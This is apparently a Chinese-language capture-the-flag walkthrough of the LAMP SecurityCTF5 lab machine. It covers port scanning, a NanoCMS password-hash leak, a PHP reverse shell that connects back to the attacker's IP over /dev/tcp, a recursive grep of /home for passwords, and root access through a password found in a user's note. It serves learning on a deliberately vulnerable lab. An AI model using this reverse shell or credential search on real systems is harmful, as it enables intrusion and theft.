LAMP SecurityCTF5
一、nmap
cat ports | grep open | awk -F '/' '{print $1}' | tr '\n' ','
cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',' > nmap_open_port_total.txt
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7 (protocol 2.0)
| ssh-hostkey:
| 1024 05:c3:aa:15:2b:57:c7:f4:2b:d3:41:1c:74:76:cd:3d (DSA)
|_ 2048 43:fa:3c:08:ab:e7:8b:39:c3:d6:f3:a4:54:19:fe:a6 (RSA)
25/tcp open smtp Sendmail 8.14.1/8.14.1
| smtp-commands: localhost.localdomain Hello [192.168.126.201], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP
|_ 2.0.0 This is sendmail 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 2.2.6 ((Fedora))
|_http-server-header: Apache/2.2.6 (Fedora)
|_http-title: Phake Organization
110/tcp open pop3 ipop3d 2006k.101
|_pop3-capabilities: LOGIN-DELAY(180) TOP UIDL USER STLS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-04-29T11:31:53
|_Not valid after: 2010-04-29T11:31:53
|_ssl-date: 2024-03-28T00:54:54+00:00; -3h58m23s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 32768/udp status
|_ 100024 1 58217/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp open imap University of Washington IMAP imapd 2006k.396 (time zone: -0400)
|_imap-capabilities: NAMESPACE ESEARCH UNSELECT THREAD=REFERENCES CHILDREN BINARY LITERAL+ MAILBOX-REFERRALS SCAN IDLE IMAP4REV1 SASL-IR STARTTLSA0001 CAPABILITY WITHIN OK completed LOGIN-REFERRALS UIDPLUS THREAD=ORDEREDSUBJECT SORT MULTIAPPEND
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-04-29T11:31:53
|_Not valid after: 2010-04-29T11:31:53
|_ssl-date: 2024-03-28T00:54:55+00:00; -3h58m23s from scanner time.
445/tcp open netbios-ssn Samba smbd 3.0.26a-6.fc8 (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.0 401 Authorization Required\x0D
|_ Basic realm=SWAT
3306/tcp open mysql MySQL 5.0.45
| mysql-info:
| Protocol: 10
| Version: 5.0.45
| Thread ID: 6
| Capabilities flags: 41516
| Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, ConnectWithDatabase, LongColumnFlag, SupportsCompression
| Status: Autocommit
|_ Salt: zxk0Mqp^hq{9F5vtezX(
58217/tcp open status 1 (RPC #100024)
二、web渗透
目录爆破
/events/
我们就先从这入手
/events/robots.txt
searchsploit
/events/就先到这把,刚刚有一个注册登入的也貌似不行
/~andy/data/nanoadmin.php
貌似想要先登入进去才可正常利用
google一下
/data/pagesdata.txt
还真是
s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";
admin:shannon
/~andy/data/nanoadmin.php
admin:shannon 成功登入
/~andy/index.php?page=123
php反弹shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.201/7777 0>&1'")?>
三、内网渗透
README\ FIRST.txt
/home
Permission denied test.txt
/etc/crontab
searchsploit尝试提权
/etc/passwd
查看存在passwd字眼的文件内容
结合/etc/passwd中有Bash的用户有很多,很有可能其中的某个用户会在自己家目录中的文件里写入有关root的密码。我们在/home目录搜索一下包含'pass'字符串的文件有哪些
grep -R -i pass /home/* 2>/dev/null
该命令的含义是在/home/目录下递归搜索包含不区分大小写的字符串"pass"的文件,并将搜索结果输出到标准输出。命令的具体解释如下:
grep: 是一个用于在文件中搜索指定模式的命令。
-R: 表示递归搜索,将在指定目录及其子目录下搜索文件。
-i: 表示忽略大小写,在搜索时不区分大小写。
pass: 是要搜索的字符串模式。
/home/*: 搜索的目录路径,/home/表示在/home/目录下搜索,*表示搜索所有子目录和文件。
2>/dev/null: 将标准错误输出重定向到/dev/null设备,这样错误信息将被丢弃而不会显示在终端上。
结果搜到了非常多的文件,我们慢慢往下翻找,最终发现/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note含有一个title标签,为Root password,这很可能就是root密码所在
su - 成功提权
bash-3.2$ su -
Password: 50$cent
